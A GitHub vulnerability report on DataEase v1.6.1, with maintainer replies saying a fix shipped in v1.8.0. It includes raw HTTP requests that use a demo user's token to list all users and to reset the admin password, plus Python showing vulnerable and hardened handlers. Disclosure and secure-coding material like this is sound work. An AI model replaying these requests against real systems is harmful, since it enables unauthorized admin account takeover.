
Security Issues [Bug] #1618

Closed · espduino opened this issue Jan 11, 2022 · 3 comments
Labels: Priority: planned; Type: bug (Something isn't working)

espduino commented Jan 11, 2022

DataEase version
v1.6.1

Browser version
Chrome 96.0.4664.110

Bug description
I found a Broken Access Control vulnerability.
An authenticated user can access information about all users and change the admin password.

Bug reproduction steps (screenshots preferred)

  1. Log in with the demo account.
  2. This API returns information about all users:

```http
POST /api/user/userGrid/1/10 HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 13

{"orders":[]}
```

  3. This API changes the admin password:

```http
POST /api/user/adminUpdatePwd HTTP/1.1
Host: dataease.fit2cloud.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
LINK-PWD-TOKEN: null
Connection: close
Referer: https://dataease.fit2cloud.com/
Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
Content-Length: 36

{"userId":1,"newPassword":"SECtest"}
```

Now you can log in with admin/SECtest.
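The following is an added Python example, not code from the report or from DataEase. It decodes the payload of the JWT posted in the report (without verifying the signature, since the server's HS256 key is unknown, and the token itself expired on 2022-01-11) to show that the caller is userId 2 / "demo", not the admin. It then contrasts constructed stand-ins for the `adminUpdatePwd` and `userGrid` handlers that accept any authenticated caller with hardened versions that look up the caller's role server-side and require admin. The user table, handler bodies, role names and status codes are assumptions; the actual fix shipped in DataEase v1.8.0 is not reproduced here.

```python
import base64
import copy
import json

# JWT exactly as posted in the report (header.payload.signature).
# Only the payload is decoded below; the signature is NOT verified, since the
# server-side HS256 key is unknown. This is inspection, not authentication.
DEMO_JWT = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0."
    "m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg"
)

# Constructed user table (assumption): admin is userId 1, matching the
# "userId":1 in the report's adminUpdatePwd body; demo is userId 2.
USERS = {
    1: {"username": "admin", "role": "admin", "password": "admin-secret"},
    2: {"username": "demo", "role": "user", "password": "demo"},
}


def jwt_claims(token):
    """Return the JWT payload as a dict. No signature check (see above)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def is_admin(users, caller):
    """Role comes from the server-side table, never from the token body."""
    record = users.get(caller.get("userId"))
    return record is not None and record["role"] == "admin"


# --- adminUpdatePwd: vulnerable vs hardened (both stand-ins, not DataEase code)

def admin_update_pwd_vulnerable(users, caller, body):
    """Authenticated is treated as authorized: any caller resets any password."""
    users[body["userId"]]["password"] = body["newPassword"]
    return 200


def admin_update_pwd_fixed(users, caller, body):
    """Function-level check: caller must be admin; target must exist."""
    if not is_admin(users, caller):
        return 403
    target = users.get(body["userId"])
    if target is None:
        return 404
    target["password"] = body["newPassword"]
    return 200


# --- userGrid: vulnerable vs hardened

def user_grid_vulnerable(users, caller):
    """Returns every account to any authenticated caller."""
    return 200, [{"userId": uid, "username": u["username"], "role": u["role"]}
                 for uid, u in users.items()]


def user_grid_fixed(users, caller):
    """Only admins may list users; everyone else gets 403 and no rows."""
    if not is_admin(users, caller):
        return 403, []
    return user_grid_vulnerable(users, caller)


def replay_password_reset(handler):
    """Replay the report's adminUpdatePwd request against a fresh copy of the
    table: the demo user (taken from the JWT) posts
    {"userId":1,"newPassword":"SECtest"}.
    Returns (HTTP status, admin's password afterwards)."""
    users = copy.deepcopy(USERS)
    caller = jwt_claims(DEMO_JWT)
    status = handler(users, caller, {"userId": 1, "newPassword": "SECtest"})
    return status, users[1]["password"]


def replay_user_list(handler):
    """Replay the report's userGrid request. Returns (HTTP status, row count)."""
    status, rows = handler(copy.deepcopy(USERS), jwt_claims(DEMO_JWT))
    return status, len(rows)


if __name__ == "__main__":
    print("token claims:", jwt_claims(DEMO_JWT))
    print("userGrid       vulnerable:", replay_user_list(user_grid_vulnerable),
          " fixed:", replay_user_list(user_grid_fixed))
    print("adminUpdatePwd vulnerable:", replay_password_reset(admin_update_pwd_vulnerable),
          " fixed:", replay_password_reset(admin_update_pwd_fixed))
```

The point of the hardened handlers is that the role is resolved from the server's own user record for the `userId` in a verified token, not trusted from anything the client sends; a signed token only proves who the caller is, not what they may do, so each privileged endpoint needs its own authorization check.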

xuwei-fit2cloud (Contributor) commented:

Thanks for the report. The problem does exist; we will deal with it as soon as possible.

BBchicken-9527 commented:

Thanks for the report. This issue will be fixed in the next major version.

xuwei-fit2cloud (Contributor) commented:

Fixed in v1.8.0; please watch for the new release.
